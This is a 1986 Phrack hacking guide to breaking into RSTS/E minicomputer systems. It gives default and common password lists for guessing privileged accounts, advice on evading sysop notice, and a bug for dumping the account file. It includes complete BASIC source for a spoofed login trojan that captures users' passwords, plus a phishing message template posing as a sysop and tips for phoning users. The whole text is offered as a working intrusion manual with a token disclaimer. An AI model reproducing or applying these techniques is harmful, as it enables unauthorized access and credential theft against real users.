267 lines
11 KiB
Text
267 lines
11 KiB
Text
==Phrack Inc.==
|
|
|
|
Volume One, Issue 7, Phile 5 of 10
|
|
|
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|
$ $
|
|
$ PROGRAMMING RSTS/E $
|
|
$ File1: Passwords $
|
|
$ $
|
|
$ by: The Seker $
|
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|
$ Written (c) May 22, 1986 $
|
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|
|
|
PREFACE:
|
|
--------
|
|
|
|
This document is first in a series of ongoing files about using the
|
|
RSTS/E operating system. All the files are based on version 8.0 as it is
|
|
almost fully compatible with the previous releases. If the need arises I have
|
|
made sure to note differences between V8.x and V9.x.
|
|
Credit goes to High Evolutionary for urging me to write these files; to
|
|
Night Stalker for sharing info; and to all other RSTS hackers that have
|
|
contributed in some way or another.
|
|
|
|
HISTORY:
|
|
--------
|
|
The RSTS/E (Resource System Time Sharing /Environment) operating system
|
|
was developed for the PDP/11 series of minicomputers created by DEC. (Digital
|
|
Equipment Corporation) It was developed with ease of use for the user (and
|
|
hacker) in mind. Because of this, there have been a lot of overlooked errors
|
|
leaving the system with quite weak security. In later versions, especially
|
|
the 9.x series password security has been greatly improved and is more secure,
|
|
but still has plenty of bugs for us to breach.
|
|
|
|
LOGGING ON:
|
|
-----------
|
|
Briefly.. locate a valid number and connect. Hit c/r (carriage return) a
|
|
few times or type:
|
|
HELLO
|
|
The system should identify itself displaying to you who owns it, what version
|
|
they're running under, the date, and the time. Then it will prompt for an
|
|
account number and a password.
|
|
Accounts are in a PPN (Project Program Number) format. This is actually
|
|
two numbers each between 0 and 254 separated by a comma or a slash. (eg. 3,45
|
|
or 27/248) Privileged accounts which you should hopefully be striving for all
|
|
start with a 1. So start hacking 1,x accounts.
|
|
Passwords are 1-6 characters long. They are only alphanumeric so you
|
|
don't have to worry about all that other shit being included. On V9.x systems
|
|
passwords may be up to 8 characters if the operator has changed the default
|
|
length. But this rarely ever happens as most ops are too lazy.
|
|
Common passwords are:
|
|
SYSLIB
|
|
SYSGEN
|
|
SYSCON
|
|
SYSMGR
|
|
SYSOPR
|
|
SYSTEM
|
|
OPRATR
|
|
RSTS
|
|
DECNET
|
|
GAMES
|
|
YYYYYY
|
|
XXXXXX
|
|
XYXYXY
|
|
DATA
|
|
RICH
|
|
XXX
|
|
AAA
|
|
Many of those have been rumored to be defaults. But actually I think the
|
|
true default (if there is one!) password is:
|
|
RSTSE
|
|
Also, accounts that have a password of:
|
|
??????
|
|
are only accessible by operators.
|
|
Remember to try names, cars, objects, the name of the company (in
|
|
different variations), etc. Cause most people generally pick passwords that
|
|
have some relation to their private life.. Take a little time and guess...
|
|
|
|
YOUR IN!
|
|
--------
|
|
Once you have succeeded in hacking out a valid password, whether it be
|
|
privileged or not, I suggest you find out who is logged onto the system. You
|
|
can do this simply by typing:
|
|
SY
|
|
This will tell you everyone logged on, what they are doing at the moment,
|
|
their job number, whether they are attached or detached, and a hell of a lot of
|
|
other crap. What you are looking for is someone else logged in under the same
|
|
account you are. If you find another user in the same account you hacked, log
|
|
off and call back later. This will prolong the life of your account and
|
|
prevent a rise in suspicion by the sysops. Remember, every system keeps a log
|
|
of what you do, and if two people are logged in under the same account many
|
|
times the sysops will delete or change the password to that account.
|
|
If everything checks out okay, you're free to do as you please. To list
|
|
the files in your allotted space type:
|
|
DIR
|
|
or to see all the files on the system type:
|
|
DIR (*,*)
|
|
NOTE: [ ] may be used in place of ( ) when dealing with files.
|
|
* acts as a wildcard on the RSTS system and can be used in place of
|
|
account numbers when searching for specific files. Speaking of searching for
|
|
files; to run a file type:
|
|
RUN filename.filetype
|
|
where filename = the file you wish to run, and filetype = the extension.
|
|
Experiment! Try what you will. If you ever need help just type:
|
|
HELP
|
|
Read the files contained within help. They are very detailed and I
|
|
guarantee can help you with what ever it is you need done.
|
|
One other thing, a few useful control characters are:
|
|
^C Breaks out of whatever your doing
|
|
^R Repeats last line typed
|
|
^X If ^C doesn't work, this may
|
|
^O Use to stop the flow of text without aborting the function in process
|
|
^T Tells status and runtime of terminal
|
|
^U Deletes line presently being typed in
|
|
^H Deletes characters
|
|
^S Transmission off
|
|
^Q Transmission on
|
|
|
|
GAINING PRIVILEGES:
|
|
-------------------
|
|
If you weren't able to hack out a privileged account don't panic. There
|
|
are still a few other ways for you to attain sysop status. These methods may
|
|
not always work, but they are worth a try.
|
|
]SYSTEM LOG[
|
|
On many RSTS/E systems before V9.0 there is one account dedicated to
|
|
keeping the system log; everything you and everyone else does. I have found
|
|
this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
|
|
directory find to make sure. Type:
|
|
DIR (*,*)OPSER.LOG
|
|
or if nothing appears from that type:
|
|
DIR (*,*)SYSLOG.*
|
|
or
|
|
DIR (*,*)
|
|
Look for a file similar in name to that and mark down the account it
|
|
appears in. Now that you know which account the system log resides in logoff.
|
|
BYE
|
|
Then sign back on using the account in which the file was in. For
|
|
password try one of the following:
|
|
OPSER
|
|
OPSLOG
|
|
LOG
|
|
OPS
|
|
OOPS
|
|
OPRATR
|
|
SYSLOG
|
|
SYSTEM
|
|
These are common passwords to that account. If none of these work your
|
|
out of luck unless you can think of some other password that may be valid.
|
|
]SYSTEM BUGS[
|
|
When operating systems as complex as RSTS/E are created there will
|
|
undoubtedly be a few bugs in the operation or security. (Sometimes I am not
|
|
sure if these are intentional or not.) These can often be taken advantage of.
|
|
One that I know of is RPGDMP.TSK. To use this type:
|
|
RUN (1,2)RPGDMP
|
|
It will ask for a filename, and an output device. Give it any filename on
|
|
the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
|
|
the specified device. (db1:, screen, etc).
|
|
Credit for this goes to The Marauder of LOD for finding, exposing and
|
|
sharing this bug with all.
|
|
If you find any other bugs similar to this, I would appreciate your
|
|
getting in touch with and letting me know.
|
|
|
|
GETTING PASSWORDS:
|
|
------------------
|
|
Now that you've hopefully gotten yourself priv's we can get on with these
|
|
files. Getting many passwords is a safety procedure, kind of like making a
|
|
backup copy of a program. There are a number of ways to get yourself
|
|
passwords, the easiest is by using privileges, but we will discuss that in a
|
|
later file. The methods I am going to explain are the decoy and a trick I like
|
|
to use, which I call the mail method.
|
|
]DECOY[
|
|
The decoy, commonly called a Trojan Horse, (which is something completely
|
|
different) is a program which emulates login.bac. When the unsuspecting user
|
|
enters his account and password you have your program store it into a file that
|
|
you can retrieve later. Here is a short program I've written that will preform
|
|
this task:
|
|
|
|
type NEW and it will prompt for a filename. Enter something not to obvious.
|
|
|
|
1 ! RSTSE Decoy
|
|
2 ! Written by The Seker (c) 1986 TOK!
|
|
5 extend
|
|
10 print:print
|
|
20 &"RSTS V8.0-07 TOK Communications Ltd. Job 7 <Dial-up> KB41
|
|
";date$(0);" ";time$(0)
|
|
30 print
|
|
40 &"User: ";
|
|
50 open "KB:" for input as file 1
|
|
60 on error goto 300
|
|
70 input 1,proj%,prog%
|
|
80 z$=sys(chr$(3%))
|
|
90 &"Password: ";
|
|
100 on error goto 300
|
|
110 input 1,pass$
|
|
120 print:z$=sys(chr$(2%))
|
|
130 close 1
|
|
140 open "SYSLIB.BAC" for output as file 2
|
|
150 print 2,proj%
|
|
160 print
|
|
2,prog%
|
|
170 print 2,pass$
|
|
180 close 2
|
|
200 print:print
|
|
210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
|
|
300 if erl=70 then goto 350
|
|
310 if erl=110 then goto 360
|
|
350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
|
|
200 else resume 30
|
|
360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
|
|
90
|
|
999 end
|
|
|
|
The program as I said emulates login.bac, then logs the person off after a
|
|
few tries. Save this program. Then run it. When it starts, just drop the
|
|
carrier. The next person to call within 15 minutes will get your imitation
|
|
login.
|
|
If you are working on an older system like V7.0 change line 40 to read:
|
|
40 &" ";
|
|
NOTE: This will not work without modifications on releases after V8.7. An
|
|
improved and updated version of this program will be released as a small file
|
|
at a later date.
|
|
Next time you login and you want to recover the file type:
|
|
TYPE SYSLIB.BAC
|
|
It should print out the account and password. If you set this running
|
|
each time you plan on hanging up within a few days you'll have yourself a
|
|
handful of valid accounts.
|
|
]MAIL[
|
|
To run mail type:
|
|
RUN $MAIL
|
|
The mail method is probably used by many hackers and since I like to use
|
|
it, I thought I'd tell you what it was.
|
|
When you run the program the utility will tell you exactly how to use
|
|
itself. Assuming you know a little about it anyway we will get on with the
|
|
file. The object is to send mail to another user and try and convince him/her
|
|
you are the sysop and are writing him/her to validate their password. Don't
|
|
try this with a priv'd user! It would result in instant deletion.
|
|
Here's basically what you'd type:
|
|
|
|
Hello. We are contacting each of the users and validating their records to
|
|
keep our files up to date. If you would cooperate and leave me a response which
|
|
includes your full name, account number, and password we would appreciate your
|
|
help.
|
|
|
|
John Doe
|
|
System's Operator
|
|
4,11
|
|
|
|
As you can see the idea is to con a user into believing you are one of the
|
|
system ops. I would say this method works approximately 70% of the time on
|
|
most systems since users often times don't associate with sysops. Use a
|
|
different name if you try this though, as John Doe wouldn't fool anyone. (Be
|
|
creative) Also the 4,11 is the account you'd like them to leave the response
|
|
too.
|
|
You can try a few variations of this if you like. For example, if the
|
|
system you're hacking has a chat program:
|
|
|
|
RUN $TALK
|
|
|
|
You can just talk live time to them. Or if you somehow (like trashing) manage
|
|
to get a list of all the users and their phone numbers, you can call them up
|
|
and bullshit them.
|
|
|
|
NOTE: This document is intended for informational purposes only. The author
|
|
is in no way responsible for how it is used. Sysops are free to
|
|
display this at their will as long as no information within is altered
|
|
and all acknowledgements go to The Seker.
|